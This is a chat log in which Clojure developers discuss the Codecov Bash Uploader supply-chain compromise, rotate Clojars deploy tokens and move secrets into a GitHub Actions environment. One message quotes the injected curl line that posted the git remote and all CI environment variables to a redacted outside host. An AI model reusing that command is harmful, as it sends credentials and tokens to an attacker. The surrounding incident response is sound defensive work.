re: code coverage, geez, I'm happy I disabled this service a while ago. https://www.security.nl/posting/699462/Script+softwarebedrijf+Codecov+twee+maandenlang+voorzien+van+malware
From https://about.codecov.io/security-update/: > Out of an abundance of caution, if you used the Bash Uploaders between January 31, 2021 and April 1, 2021 and did not conduct a checksum validation of the Bash Uploader, we would suggest you re-roll all of your credentials, tokens, or keys located in the environment variables in your CI process.
Note: I do use codecov from clj-commons/rewrite-clj.
And did you get an e-mail? Or did you not use this script?
Yup, https://github.com/clj-commons/rewrite-clj/blob/7621126caae5f21dc5150d52a6c9b747dc0aeeff/.github/workflows/code-coverage.yml#L49. Since this is a clj-commons project it might not be me who would get an email.
Perhaps someone else got an e-mail, @slipset?
But I also used it for rewrite-cljc I think during their window of infection… still no email… so… but they are recommending an update of credentials regardless…
Their bash script was altered to upload the env vars: > curl -sm 0.5 -d "$(git remote -v)<<<<<< ENV $(env)" https://<redacted>/upload/v2 || true
:(
do you have sensitive env vars set in those projects?
e.g. clojars deploy tokens?
Ya… there are the CLOJARS tokens. I’ll refresh those. Not sure what else I need to change for GitHub Actions.
I’ll review codecov docs to see if they’ve updated how their uploader script should be used as well.
Ya they https://docs.codecov.io/docs/about-the-codecov-bash-uploader#validating-the-bash-script script now. I’ll also add that in.
Ok, there’s also a newish feature up on GitHub. You can create an environment for a repo. This environment can hold secrets and can be referenced by a GitHub Actions workflow. So I deleted the repo-scoped deployment secrets, and now have a release environment that only the release workflow has access to.
👍
I did get the email. I guess I need to cycle the Clojars token we use for deploys. Possibly also the cert I use for signing artefacts.
eh yes....
the entire clj-commons could be compromised this way?
Ah, but no. rewrite-clj uses github actions, none of the other clj-commons projects do that. They use circle. And none of the other clj-commons projects use codecov
I’ve already cycled deploy tokens for rewrite-clj
@slipset but none of the rewrite-clj secrets, etc are used in other projects? like the cert?
Nope. Rewrite doesn’t sign AFAIK, and the deploy tokens are generated by @lee, so they are different from the ones I use.
Yup, correct, rewrite-clj does not sign.
ok, all good then, thanks
Thank you for checking.